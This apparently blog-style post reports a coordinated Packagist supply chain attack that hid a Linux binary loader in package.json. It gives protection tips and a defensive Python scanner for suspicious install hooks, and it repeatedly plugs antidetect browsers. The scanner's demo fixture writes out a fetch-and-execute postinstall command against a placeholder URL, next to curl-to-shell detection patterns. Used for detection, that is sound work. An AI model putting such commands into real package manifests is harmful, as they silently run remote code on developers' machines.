A coordinated supply chain attack on Packagist infected 8 packages with Linux malware hidden in package.json, not composer.json. Learn how to protect your development workflow.
A new coordinated supply chain attack campaign has hit eight packages on Packagist, slipping in malicious code that runs a Linux binary from a GitHub Releases URL. This isn't your typical hack-and-run job; it's a carefully orchestrated effort that targets developers who use Composer for PHP dependencies. But here's the twist: the bad code wasn't tucked into the usual composer.json file. Instead, it was planted in package.json, which means it's aimed at projects that also handle JavaScript.
### What Happened?
Security firm Socket analyzed the attack. They found that while all affected packages were Composer packages, the malicious payload lived in package.json. That file is normally used for Node.js projects, but in this case it was repurposed to trigger a Linux binary hosted on GitHub Releases. When a developer installs one of these compromised packages, the binary runs in the background, potentially giving attackers control over the system.
Here's what we know about the campaign:
- **8 packages were infected** on Packagist, the main repository for PHP packages.
- **The attack was coordinated**, meaning it wasn't random; someone planned this.
- **The malware is Linux-based**, so it targets servers and development machines running Linux.
- **GitHub Releases was used** to host the malicious binary, so the download comes from a domain most people trust.
### Why This Matters for Developers
If you're a developer using Composer, this attack is a wake-up call. Supply chain attacks are getting smarter. They don't just mess with the obvious files; they hide in places you might not check. The fact that package.json was used instead of composer.json shows attackers are studying how projects are structured. They know many PHP projects also use JavaScript tools, so they exploit that overlap.
Think of it like this: you lock your front door (composer.json), but they sneak in through the window (package.json). It's a reminder to review all dependencies, not just the main ones. For teams using antidetect browsers to manage multiple online identities, this attack adds another layer of risk. If your development environment is compromised, your antidetect browser profiles could be exposed, leaking sensitive data.
### How to Protect Your Workflow
Staying safe means being proactive. Here are some steps you can take:
- **Audit your dependencies regularly.** Run `composer audit` to check your installed packages against known vulnerability advisories.
- **Review package.json files** in your projects, even if you don't use Node.js. Attackers might still target them.
- **Monitor GitHub Releases URLs** in your code. If a package downloads something from a release, verify it's from a trusted source.
- **Use a sandbox environment** for testing new packages. This isolates any potential malware before it hits your main system.
- **Keep your antidetect browser updated** to protect against any exploits that might target your browser profiles.
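As an added example, not code from Socket's report or from any of the affected packages, here is a small Python scanner that walks a Composer `vendor/` tree and flags `package.json` lifecycle scripts that reference a GitHub Releases download URL or fetch-and-execute something. The article does not say which part of package.json carried the payload, so treating install hooks as the vector is an assumption, and the two sample packages are constructed for the demo.

```python
import json
import os
import re
import tempfile
from pathlib import Path

# npm hooks that run automatically on install. ASSUMPTION: the campaign used
# one of these; the report summarised above does not give the exact mechanism.
LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare", "prepublish"}
# A GitHub Releases asset URL, the hosting pattern described in the article.
RELEASE_URL = re.compile(r"https?://github\.com/[^/\s]+/[^/\s]+/releases/download/\S+")
# Generic "download it, then run it" shapes worth a second look.
FETCH_AND_RUN = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b|chmod\s+\+x")

def scan_package_json(path):
    """Return a list of (hook, reason, command) findings for one package.json."""
    findings = []
    try:
        data = json.loads(Path(path).read_text(encoding="utf-8"))
    except (OSError, ValueError):
        return findings  # unreadable or not JSON: nothing to flag here
    scripts = data.get("scripts") or {}
    if not isinstance(scripts, dict):
        return findings
    for hook, cmd in scripts.items():
        if hook not in LIFECYCLE_HOOKS or not isinstance(cmd, str):
            continue
        if RELEASE_URL.search(cmd):
            findings.append((hook, "github-release-download", cmd))
        elif FETCH_AND_RUN.search(cmd):
            findings.append((hook, "fetch-and-execute", cmd))
    return findings

def scan_tree(root):
    """Walk vendor/ (or node_modules/) and map each suspicious package.json to its findings."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        if "package.json" in files:
            p = os.path.join(dirpath, "package.json")
            hits = scan_package_json(p)
            if hits:
                results[os.path.relpath(p, root)] = hits
    return results

def demo():
    """Constructed sample tree: one clean package, one with a suspicious postinstall hook."""
    root = Path(tempfile.mkdtemp())
    clean, bad = root / "vendor/acme/clean", root / "vendor/acme/suspicious"
    clean.mkdir(parents=True); bad.mkdir(parents=True)
    (clean / "package.json").write_text(json.dumps({"name": "clean", "scripts": {
        "build": "vite build", "postinstall": "node scripts/setup.js"}}))
    (bad / "package.json").write_text(json.dumps({"name": "suspicious", "scripts": {
        "postinstall": "curl -sL https://github.com/EXAMPLE-ORG/EXAMPLE-REPO/releases/download/v1/agent"
                       " -o /tmp/a && chmod +x /tmp/a && /tmp/a"}}))  # placeholder URL, not a real IoC
    return scan_tree(root)
```

Run `demo()` to see the constructed suspicious package flagged; point `scan_tree()` at a real `vendor/` directory to check your own projects.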
### The Bigger Picture
This attack isn't isolated. Supply chain attacks have been on the rise, with campaigns targeting everything from npm packages to PyPI libraries. The use of GitHub Releases as a hosting platform is clever—it's a trusted domain, so it might bypass some security filters. For developers, it means we can't rely on reputation alone. Even a package from a known author could be compromised if their account is hacked.
Socket's report highlights a key point: the malicious code wasn't complex, but the delivery method was. By targeting package.json, attackers reached a wider audience. It's a reminder that security is about layers. You can't just trust one file or one platform. You have to check everything.
### Final Thoughts
If you're using any of the affected packages, remove them immediately and scan your system for any signs of compromise. For everyone else, use this as a lesson. The digital landscape is evolving, and so are the threats. Whether you're managing antidetect browsers for privacy or building the next big app, staying vigilant is your best defense. Keep your tools updated, audit your code, and never assume you're safe just because you're using a trusted repository.
For more insights on digital privacy and security, follow me, Robert Moore, as I continue to explore the intersection of antidetect technology and cybersecurity.